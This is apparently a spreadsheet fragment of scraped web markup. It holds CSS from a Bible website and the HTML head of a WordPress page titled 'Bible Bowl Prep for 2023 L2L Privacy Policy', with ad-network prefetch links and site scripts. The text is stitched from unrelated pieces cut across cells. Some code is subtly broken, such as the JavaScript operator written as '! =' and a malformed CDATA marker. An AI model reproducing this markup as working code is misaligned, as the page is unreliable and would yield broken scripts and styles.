dotted;}b,strong{font-weight:bold;}small{font-size:80%;}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline;}sub{bottom:-0.25em;}sup{top:-0.5em;}img{border-style:none;}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0;}button,input{overflow:visible;}button,select{text-transform:none;}button::-moz-focus-inner,[type="button"]::-moz-focus-inner,[type="reset"]::-moz-focus-inner,[type="submit"]::-moz-focus-inner{border-style:none;padding:0;}fieldset{padding:0.35em 0.75em 0.625em;}legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal;}progress{vertical-align:baseline;}textarea{overflow:auto;}[type="checkbox"],[type="radio"]{box-sizing:border-box;padding:0;}[type="number"]::-webkit-inner-spin-button,[type="number"]::-webkit-outer-spin-button{-webkit-appearance:none!important;}input[type="number"]{-moz-appearance:textfield;}[type="search"]{-webkit-appearance:textfield;outline-offset:-2px;}[type="search"]::-webkit-search-decoration{-webkit-appearance:none!important;}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit;}details{display:block;}summary{display:-webkit-box;display:-webkit-list-item;display:-ms-list-itembox;display:list-item;}template{display:none;}[hidden]{display:none!important;}body,blockquote,dl,dd,h1,h2,h3,h4,h5,h6,hr,figure,p,pre{margin:0;}button{background:transparent;padding:0;}fieldset{margin:0;padding:0;}ol,ul{margin:0;padding:0;}textarea{resize:vertical;}button,[role="button"]{cursor:pointer;}button::-moz-focus-inner{border:0!important;}table{border-collapse:collapse;}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit;}button,input,optgroup,select,textarea{padding:0;line-height:inherit;color:inherit;}img,svg,video,canvas,audio,iframe,embed,object{display:block;}img,video{max-width:100%;height:auto;}[data-js-focus-visible] :focus:not([data-focus-visible-added]):not([data-focus-visible-disabled]){outline:none;box-shadow:none;}select::-ms-expand{display:none;}:root,:host{--chakra-vh:100vh;}@supports (height: -webkit-fill-available){:root,:host{--chakra-vh:-webkit-fill-available;}}@supports (height: -moz-fill-available){:root,:host{--chakra-vh:-moz-fill-available;}}@supports (height: 100dvh){:root,:host{--chakra-vh:100dvh;}}&lt;/style&gt;&lt;style data-emotion="bible-global 1jgp7ks"&gt;body{font-family:var(--fonts-body);color:chakra-body-text;background:var(--colors-chakra-body-bg);transition-property:background-color;transition-duration:var(--transition-duration-normal);line-height:base;}*::-webkit-input-placeholder{color:chakra-placeholder-color;}*::-moz-placeholder{color:chakra-placeholder-color;}*:-ms-input-placeholder{color:chakra-placeholder-color;}*::placeholder{color:chakra-placeholder-color;}*,*::before,::after{border-color:chakra-border-color;word-wrap:break-word;}&lt;/style&gt;&lt;style data-emotion="bible 2i4l7w 1pzarut tp28g8 154qay4 1l5f9al 10r6u3h 11mvhyz 3iyzw8 1snkzlc 1lipgxu yd390i l92w1a cgwc45 1hlini6 12yscz 70qvj9 yptzzv 1rb60ct</t>
  </si>
  <si>
    <t>1t8idqr 1gm3tio 1swrknq 1qq679y 16rx8dq 5e7lcr 7wf5ly ew159p 1lzcn2m 1ofyxhx</t>
  </si>
  <si>
    <t>1qp08ef 4onivj 1eduo8b</t>
  </si>
  <si>
    <t>1oyopzl yti3k5 oyiz89 13to0uh qq91bq 1wrr4ir 12hpqba 1ea0a2b x6e30y uv09ea 10ldgt6 155za0w 1alblgu 1v0g2w9 4346ym kkhsly aj4nul</t>
  </si>
  <si>
    <t>1v5ist3 1ii1qq4 64vw6q 11xk6oe 1dac0av bi9cne rihe8z 1u9gxxb 1euv4ub v3x2pu 193j0xh 17r8fs7 1e6fk5o ytumd6 d3ee4y 1pylpwn 12gadrg nnsoeo 73u4co 1vwugsq js29iq</t>
  </si>
  <si>
    <t>11avbiz 1wh2kri 1krlyqe shre2g wa7hq3 da91o4 1yd3njn cfu3ks 1jlamo8 1bmm27l ere20e enkzfh iqghbk"&gt;.bible-2i4l7w{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;overflow-x:hidden;position:relative;}.bible-1pzarut{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;background:var(--colors-white);border-bottom-color:var(--colors-gray-10);border-bottom-width:1px;inset-block-start:0px;left:0;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;padding-block:var(--space-2);position:fixed;width:var(--sizes-full);z-index:2;}@media screen and (min-width: 0em){.bible-1pzarut{padding-inline:var(--space-2);}}@media screen and (min-width: 40em){.bible-1pzarut{padding-inline:var(--space-3);}}@media screen and (min-width: 62em){.bible-1pzarut{padding-inline:var(--space-4);}}.bible-tp28g8{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;gap:var(--space-2);max-width:1200px;width:var(--sizes-full);}@media screen and (min-width: 0em){.bible-tp28g8{-webkit-box-pack:justify;-webkit-justify-content:space-between;justify-content:space-between;}}@media screen and (min-width: 40em){.bible-tp28g8{-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;}}.bible-154qay4{display:inline-block;line-height:1em;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;color:var(--colors-gray-50);}@media screen and (min-width: 0em){.bible-154qay4{height:16px;width:104px;}}@media screen and (min-width: 62em){.bible-154qay4{height:20px;width:130px;}}@media screen and (min-width: 0em){.bible-1l5f9al{display:none;}}@media screen and (min-width: 62em){.bible-1l5f9al{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}}.bible-10r6u3h{border-radius:6rem;color:var(--colors-gray-50);font-size:var(--fontSizes-13);font-weight:var(--fontWeights-bold);line-height:var(--lineHeights-default);padding-block:var(--space-1-5);padding-inline:var(--space-2);-webkit-text-decoration:none;text-decoration:none;white-space:nowrap;}.bible-10r6u3h:hover,.bible-10r6u3h[data-hover]{background:var(--colors-gray-10);}.bible-11mvhyz{-webkit-flex:1 1 auto;-ms-flex:1 1 auto;flex:1 1 auto;max-width:577px;position:relative;}@media screen and (min-width: 0em){.bible-11mvhyz{display:none;}}@media screen and (min-width: 40em){.bible-11mvhyz{display:block;}}.bible-3iyzw8{position:relative;isolation:isolate;background:var(--colors-gray-10);border-radius:6rem;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:var(--sizes-full);}.bible-3iyzw8:hover,.bible-3iyzw8[data-hover]{border-color:transparent;}@media screen and (min-width: 0em){.bible-3iyzw8{height:var(--sizes-5);}}@media screen and (min-width: 40em){.bible-3iyzw8{height:var(--sizes-6);}}.bible-1snkzlc{background:var(--colors-gray-10);border-color:transparent;border-radius:6rem;border-style:solid;box-sizing:border-box;color:var(--colors-gray-50);font-family:var(--fonts-body);font-size:var(--fontSizes-13);font-weight:var(--fontWeights-medium);line-height:var(--lineHeights-default);margin:none;outline:2px solid transparent;outline-offset:2px;padding-block:var(--space-1-5);-webkit-padding-end:var(--space-6);padding-inline-end:var(--space-6);width:var(--sizes-full);}.bible-1snkzlc::-webkit-input-placeholder{color:var(--colors-gray-25);font-weight:var(--fontWeights-medium);font-size:var(--fontSizes-13);line-height:var(--lineHeights-default);}.bible-1snkzlc::-moz-placeholder{color:var(--colors-gray-25);font-weight:var(--fontWeights-medium);font-size:var(--fontSizes-13);line-height:var(--lineHeights-default);}.bible-1snkzlc:-ms-input-placeholder{color:var(--colors-gray-25);font-weight:var(--fontWeights-medium);font-size:var(--fontSizes-13);line-height:var(--lineHeights-default);}.bible-1snkzlc::placeholder{color:var(--colors-gray-25);font-weight:var(--fontWeights-medium);font-size:var(--fontSizes-13);line-height:var(--lineHeights-default);}@media screen and (min-width: 0em){.bible-1snkzlc{height:var(--sizes-5);-webkit-padding-start:var(--space-0-5);padding-inline-start:var(--space-0-5);}}@media screen and (min-width: 40em){.bible-1snkzlc{height:var(--sizes-6);-webkit-padding-start:var(--space-3);padding-inline-start:var(--space-3);}}.bible-1snkzlc::webkit-search-decoration{display:none;}.bible-1snkzlc::-webkit-search-cancel-button{display:none;}.bible-1snkzlc::-webkit-search-results-button{display:none;}.bible-1snkzlc::-webkit-search-results-decoration{display:none;}.bible-1lipgxu{right:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;top:0px;background:var(--colors-brand-light);border-radius:3rem;cursor:pointer;height:var(--sizes-4);margin:var(--space-1);padding:var(--space-1);position:relative;width:var(--sizes-4);z-index:0;}.bible-yd390i{width:var(--sizes-3);height:var(--sizes-3);display:inline-block;line-height:1em;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;color:var(--colors-white);}.bible-l92w1a{border-radius:6rem;color:var(--colors-gray-50);font-size:var(--fontSizes-13);font-weight:var(--fontWeights-bold);line-height:var(--lineHeights-default);padding-block:var(--space-1-5);padding-inline:var(--space-2);-webkit-text-decoration:none;text-decoration:none;white-space:nowrap;}.bible-l92w1a:hover,.bible-l92w1a[data-hover]{background:var(--colors-gray-10);}@media screen and (min-width: 0em){.bible-l92w1a{display:none;}}@media screen and (min-width: 40em){.bible-l92w1a{display:block;}}@media screen and (min-width: 0em){.bible-cgwc45{display:none;}}@media screen and (min-width: 40em){.bible-cgwc45{display:block;}}.bible-1hlini6{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;border-radius:6rem;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;padding:var(--space-1);}.bible-1hlini6:hover,.bible-1hlini6[data-hover]{background:var(--colors-gray-10);}.bible-12yscz{width:var(--sizes-3);height:var(--sizes-3);display:inline-block;line-height:1em;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;color:currentColor;}.bible-70qvj9{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;}.bible-yptzzv{-webkit-margin-end:var(--space-1-5);margin-inline-end:var(--space-1-5);padding-block-start:var(--space-0-5);}@media screen and (min-width: 0em){.bible-yptzzv{display:block;}}@media screen and (min-width: 40em){.bible-yptzzv{display:none;}}.bible-1rb60ct{width:var(--sizes-4);height:var(--sizes-4);display:inline-block;line-height:1em;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;color:currentColor;background:var(--colors-gray-10);border-radius:6rem;padding:var(--space-0-5);}.bible-1t8idqr{display:-webkit-inline-box;display:-webkit-inline-flex;display:-ms-inline-flexbox;display:inline-flex;-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none;appearance:none;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;position:relative;white-space:nowrap;vertical-align:middle;outline:2px solid transparent;outline-offset:2px;border:1px solid transparent;width:-webkit-max-content;width:-moz-max-content;width:max-content;font-weight:700;font-size:1rem;-webkit-padding-start:var(--space-1-5);padding-inline-start:var(--space-1-5);-webkit-padding-end:var(--space-0-5);padding-inline-end:var(--space-0-5);background:none;border-radius:6rem;color:var(--colors-gray-50);height:unset;padding-top:var(--space-0-5);padding-bottom:var(--space-0-5);}.bible-1t8idqr:disabled,.bible-1t8idqr[disabled],.bible-1t8idqr[aria-disabled=true],.bible-1t8idqr[data-disabled]{background:none;border-color:transparent;color:#777A7B;opacity:0.5;}.bible-1t8idqr[data-loading],.bible-1t8idqr[aria-busy=true]{background:#EDEFEF;border-color:#EDEFEF;color:#777A7B;}.bible-1t8idqr:focus,.bible-1t8idqr[data-focus]{border:1px solid #3D79C2;box-shadow:inset 0px 0px</t>
  </si>
  <si>
    <t>0px 1px #3D79C2;}.bible-1t8idqr:active,.bible-1t8idqr[data-active]{box-shadow:none;background:#EDEFEF;border-color:#EDEFEF;}.bible-1t8idqr:hover,.bible-1t8idqr[data-hover]{background:var(--colors-gray-10);}.bible-1gm3tio{width:20px;height:20px;display:inline-block;line-height:1em;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;color:currentColor;}.bible-1swrknq{width:var(--sizes-4);height:var(--sizes-4);display:inline-block;line-height:1em;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;color:var(--colors-white);background:var(--colors-gray-50);border-radius:6rem;padding-block:var(--space-0-5);padding-inline:var(--space-0-25);}.bible-1qq679y{z-index:10;}.bible-16rx8dq{position:relative;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;background:var(--colors-white);border:var(--borders-none);border-radius:var(--radii-lg);box-shadow:var(--shadows-light-2);width:300px;}.bible-5e7lcr{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-flex:1;-ms-flex:1;flex:1;-webkit-box-pack:justify;-webkit-justify-content:space-between;justify-content:space-between;position:relative;}@media screen and (min-width: 0em){.bible-5e7lcr{margin-bottom:65px;margin-top:75px;}}@media screen and (min-width: 40em){.bible-5e7lcr{margin-bottom:0px;margin-top:81px;}}@media screen and (min-width: 0em){.bible-7wf5ly{max-width:var(--sizes-full);}}@media screen and (min-width: 90em){.bible-7wf5ly{max-width:var(--sizes-container-xl);}}.bible-ew159p{-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;background-color:var(--colors-white);display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;position:relative;}@media screen and (min-width: 0em){.bible-ew159p{font-size:var(--fontSizes-13);}}@media screen and (min-width: 40em){.bible-ew159p{font-size:var(--fontSizes-16);}}.bible-1lzcn2m{margin-block-end:var(--space-8);max-width:1200px;}@media screen and (min-width: 40em){.bible-1lzcn2m{margin-block-start:var(--space-8);}}.bible-1ofyxhx{position:relative;}@media screen and (min-width: 0em){.bible-1ofyxhx{background-color:var(--colors-gray-50);padding-block-end:var(--space-3);padding-block-start:var(--space-8);p</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;title&gt;Bible Bowl Prep for 2023 L2L Privacy Policy | iPreacher&lt;/title&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
&lt;link rel="pingback" href="https://ipreacher.wordpress.com/xmlrpc.php"&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel='dns-prefetch' href='//s0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//s1.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//s2.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts-api.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.pubmine.com' /&gt;
&lt;link rel='dns-prefetch' href='//x.bidswitch.net' /&gt;
&lt;link rel='dns-prefetch' href='//static.criteo.net' /&gt;
&lt;link rel='dns-prefetch' href='//ib.adnxs.com' /&gt;
&lt;link rel='dns-prefetch' href='//aax.amazon-adsystem.com' /&gt;
&lt;link rel='dns-prefetch' href='//bidder.criteo.com' /&gt;
&lt;link rel='dns-prefetch' href='//cas.criteo.com' /&gt;
&lt;link rel='dns-prefetch' href='//gum.criteo.com' /&gt;
&lt;link rel='dns-prefetch' href='//ads.pubmatic.com' /&gt;
&lt;link rel='dns-prefetch' href='//gads.pubmatic.com' /&gt;
&lt;link rel='dns-prefetch' href='//tpc.googlesyndication.com' /&gt;
&lt;link rel='dns-prefetch' href='//ad.doubleclick.net' /&gt;
&lt;link rel='dns-prefetch' href='//googleads.g.doubleclick.net' /&gt;
&lt;link rel='dns-prefetch' href='//www.googletagservices.com' /&gt;
&lt;link rel='dns-prefetch' href='//cdn.switchadhub.com' /&gt;
&lt;link rel='dns-prefetch' href='//delivery.g.switchadhub.com' /&gt;
&lt;link rel='dns-prefetch' href='//delivery.swid.switchadhub.com' /&gt;
&lt;link rel='dns-prefetch' href='//a.teads.tv' /&gt;
&lt;link rel='dns-prefetch' href='//prebid.media.net' /&gt;
&lt;link rel='dns-prefetch' href='//adserver-us.adtech.advertising.com' /&gt;
&lt;link rel='dns-prefetch' href='//fastlane.rubiconproject.com' /&gt;
&lt;link rel='dns-prefetch' href='//prebid-server.rubiconproject.com' /&gt;
&lt;link rel='dns-prefetch' href='//hb-api.omnitagjs.com' /&gt;
&lt;link rel='dns-prefetch' href='//mtrx.go.sonobi.com' /&gt;
&lt;link rel='dns-prefetch' href='//apex.go.sonobi.com' /&gt;
&lt;link rel='dns-prefetch' href='//u.openx.net' /&gt;
&lt;link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="iPreacher &amp;raquo; Feed" href="https://ipreacher.wordpress.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="iPreacher &amp;raquo; Comments Feed" href="https://ipreacher.wordpress.com/comments/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="iPreacher &amp;raquo; Bible Bowl Prep for 2023 L2L Privacy&amp;nbsp;Policy Comments Feed" href="https://ipreacher.wordpress.com/2022/10/17/bible-bowl-prep-for-2023-l2l-privacy-policy/feed/" /&gt;
	&lt;script type="text/javascript"&gt;
		/* &lt;! [CDATA[ */
		function addLoadEvent(func) {
			var oldonload = window.onload;
			if (typeof window.onload ! = 'function') {
				window.onload = func;
			} else {
				window.onload = function () {
					oldonload();
					func();
				}
			}
		}
		/* ]]&gt; */
	&lt;/script&gt;
	&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s0.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1677072837h&amp;ver=6.2-RC2-55570"}};
/*!</t>
  </si>
  <si>
    <t>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crossorigin='anonymous' rel='stylesheet' id='all-css-0-1' href='https://s0.wp.com/_static/??-eJx9kFuKwzAMRTc0jkhf9KfMWvwQxo0cGUtuyO7HLVNSWuifDro6QoKlGM+z4qyQmynUYpoFluI5G8mJcH2jwYv8wMuYI47bINdgg0AkdpY+sq8rUoioAth6l6eEhuwCirmQVRQQXQm/Ca6oxfrpn6FUDs1r4hlyr6grKt5VwRQWfaNvYkoTbvoHfcSf2dg6OqyxdyrCbTwOx2EE1xKF+2ceAldtXbeDfvNlPJ3H/W6/Oxyuf3aFkJ8=&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-inline-css'&gt;
.has-text-align-justify {
	text-align:justify;
}
.wp-block-cover__image-background.has-parallax {
	background-size: cover;
}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-2-1' href='https://s2.wp.com/_static/??-eJyVkF1OAzEMhC+Eky5/LQ+oZ8l6reDWyUZxQrW3x0hQWLUq4iXS2P5mNPGnApxR+kTqD+oTTRxIKFFuK1EkLFRBKAZcXOLsUPXO38Jt91uvIJxz+7wp0iNn9bGbHKlGGGXGo5lRKwGPYLFzbxArT17bIvR/ixoa56h/4Dh/Yfdu2LkBlFMRgkrv7sFPrO18AWujc38beJSgygjtzTrr1cqpw09mJZunEi5/6wZ2KsbAOJZKqmBv4p6+I43bp9fhebt72W42T4+HDwGetMY=&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;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t>
  </si>
  <si>
    <t>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100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-family--albert-sans: 'Albert Sans';--wp--preset--font-family--alegreya: Alegreya;--wp--preset--font-family--arvo: Arvo;--wp--preset--font-family--bodoni-moda: 'Bodoni Moda';--wp--preset--font-family--cabin: Cabin;--wp--preset--font-family--chivo: Chivo;--wp--preset--font-family--commissioner: Commissioner;--wp--preset--font-family--cormorant: Cormorant;--wp--preset--font-family--courier-prime: 'Courier Prime';--wp--preset--font-family--crimson-pro: 'Crimson Pro';--wp--preset--font-family--dm-mono: 'DM Mono';--wp--preset--font-family--dm-sans: 'DM Sans';--wp--preset--font-family--domine: Domine;--wp--preset--font-family--eb-garamond: 'EB Garamond';--wp--preset--font-family--epilogue: Epilogue;--wp--preset--font-family--figtree: Figtree;--wp--preset--font-family--fira-sans: 'Fira Sans';--wp--preset--font-family--fraunces: Fraunces;--wp--preset--font-family--ibm-plex-mono: 'IBM Plex Mono';--wp--preset--font-family--ibm-plex-sans: 'IBM Plex Sans';--wp--preset--font-family--inter: Inter;--wp--preset--font-family--josefin-sans: 'Josefin Sans';--wp--preset--font-family--jost: Jost;--wp--preset--font-family--libre-baskerville: 'Libre Baskerville';--wp--preset--font-family--libre-franklin: 'Libre Franklin';--wp--preset--font-family--literata: Literata;--wp--preset--font-family--lora: Lora;--wp--preset--font-family--merriweather: Merriweather;--wp--preset--font-family--montserrat: Montserrat;--wp--preset--font-family--newsreader: Newsreader;--wp--preset--font-family--nunito: Nunito;--wp--preset--font-family--open-sans: 'Open Sans';--wp--preset--font-family--overpass: Overpass;--wp--preset--font-family--petrona: Petrona;--wp--preset--font-family--piazzolla: Piazzolla;--wp--preset--font-family--playfair-display: 'Playfair Display';--wp--preset--font-family--plus-jakarta-sans: 'Plus Jakarta Sans';--wp--preset--font-family--poppins: Poppins;--wp--preset--font-family--raleway: Raleway;--wp--preset--font-family--roboto-slab: 'Roboto Slab';--wp--preset--font-family--roboto: Roboto;--wp--preset--font-family--rubik: Rubik;--wp--preset--font-family--sora: Sora;--wp--preset--font-family--source-sans-pro: 'Source Sans Pro';--wp--preset--font-family--source-serif-pro: 'Source Serif Pro';--wp--preset--font-family--space-mono: 'Space Mono';--wp--preset--font-family--texturina: Texturina;--wp--preset--font-family--work-sans: 'Work Sans';--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp:</t>
  </si>
  <si>
    <t>important;}body .is-layout-constrained &gt; .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex &gt; *{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid &gt; *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) ! important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-4-1' href='https://s0.wp.com/_static/??-eJxtjksOwjAMRC9EsPi0sEEcBYVgBbeJEyWOKm6PURGqgJ3neWZsmLJxiQVZIDaTQ/PEFVyKUZEJNKKq+kXWSlZAwElI0/UzzItFp9wxakNuVyAlxdtgnXqhyiPgj33xwoCSrRvfGnJJt6bJxHAhduCRsczH/46v6nM8bfqu3+2Ph203PAFFTFhG&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='intergalactic-lato-css' href='https://fonts-api.wp.com/css?family=Lato%3A300%2C400%2C700%2C300italic%2C400italic%2C700italic%26subset%3Dlatin%2Clatin-ext&amp;#038;subset=latin%2Clatin-ext' media='all' /&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-6-1' href='https://s0.wp.com/_static/??/wp-content/themes/pub/intergalactic/inc/style-wpcom.css,/wp-content/mu-plugins/jetpack-plugin/production/modules/widgets/top-posts/style.css?m=1656429961j&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='jetpack_facebook_likebox-inline-css'&gt;
.widget_facebook_likebox {
	overflow: hidden;
}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-8-1' href='https://s1.wp.com/_static/??-eJzTLy/QTc7PK0nNK9HPLdUtyClNz8wr1k9PzdfNyU9OLMnMz0Ph6KblJGYW6SUXF+voY9dalJqUk58OZKbrA1UhcUGa7HNtDU1MLU1MLMwNTbIAmkQtqg==&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='print-css-9-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&amp;cssminify=yes' type='text/css' media='print' /&gt;
&lt;style id='jetpack-global-styles-frontend-style-inline-css'&gt;
:root { --font-headings: unset; --font-base: unset; --font-headings-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; --font-base-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-12-1' href='https://s0.wp.com/_static/??-eJyVjUEKwjAQRS9kHAVb60I8isRJSFInM6GTULx9W3Ejrty9B5/3YS4GhavnCrmZQi0kVhh9LRafH4cyiWtYkzDklcgraLSTd9a51xsThz2q7uDf3j0xggomS4YkiH7JT7NGn9f3eIJA8rC0DW75euzPl+7QDUM/Lj+0TlE=&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;script id='jetpack_related-posts-js-extra'&gt;
var related_posts_js_options = {"post_heading":"h4"};
&lt;/script&gt;
&lt;script id='wpcom-actionbar-placeholder-js-extra'&gt;
var actionbardata = {"siteID":"13844599","siteURL":"http:\/\/ipreacher.wordpress.com","xhrURL":"https:\/\/ipreacher.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"316221b1ac","isLoggedIn":"","statusMessage":"","subsEmailDefault":"instantly","proxyScriptUrl":"https:\/\/s0.wp.com\/wp-content\/js\/wpcom-proxy-request.js?ver=20211021","shortlink":"https:\/\/wp.me\/pW5BZ-lt","i18n":{"followedText":"New posts from this site will now appear in your &lt;a href=\"https:\/\/wordpress.com\/read\"&gt;Reader&lt;\/a&gt;","foldBar":"Collapse this bar","unfoldBar":"Expand this bar"}};
&lt;/script&gt;
&lt;script crossorigin='anonymous' type='text/javascript' src='https://s0.wp.com/_static/??-eJx1kE1OAzEMhS+Ea7qB6QJxFJRJ3MhDEgc7ofT2pKMOKhWsrOef79nGUwUvpVFpuBhmmTkRdCN1ceSAy1F2iz3gTV9NPXIx/ORAgs6Mml2GV73FqmQGfFSXCVzle0jusHEWatX596vGqhK6bywF37h4nDungErJNQpQxYbbL7XLXO7xYw1NDQbr67zVBiz1QOuuy0cnPV/DLeDfJsgcdZj+5TYniT/nnESDCwY+XV6zgnyuUKRADFXH7Gt+2T89T4fp8TDtl29UwpDV'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
	window.addEventListener( 'DOMContentLoaded', function() {
		rltInitialize( {"token":null,"iframeOrigins":["https:\/\/widgets.wp.com"]} );
	} );
&lt;/script&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1663315160h&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://ipreacher.wordpress.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress.com" /&gt;
&lt;link rel="canonical" href="https://ipreacher.wordpress.com/2022/10/17/bible-bowl-prep-for-2023-l2l-privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://wp.me/pW5BZ-lt' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://public-api.wordpress.com/oembed/?format=json&amp;amp;url=https%3A%2F%2Fipreacher.wordpress.com%2F2022%2F10%2F17%2Fbible-bowl-prep-for-2023-l2l-privacy-policy%2F&amp;amp;for=wpcom-auto-discovery" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" type="application/xml+oembed" href="https://public-api.wordpress.com/oembed/?format=xml&amp;amp;url=https%3A%2F%2Fipreacher.wordpress.com%2F2022%2F10%2F17%2Fbible-bowl-prep-for-2023-l2l-privacy-policy%2F&amp;amp;for=wpcom-auto-discovery" /&gt;
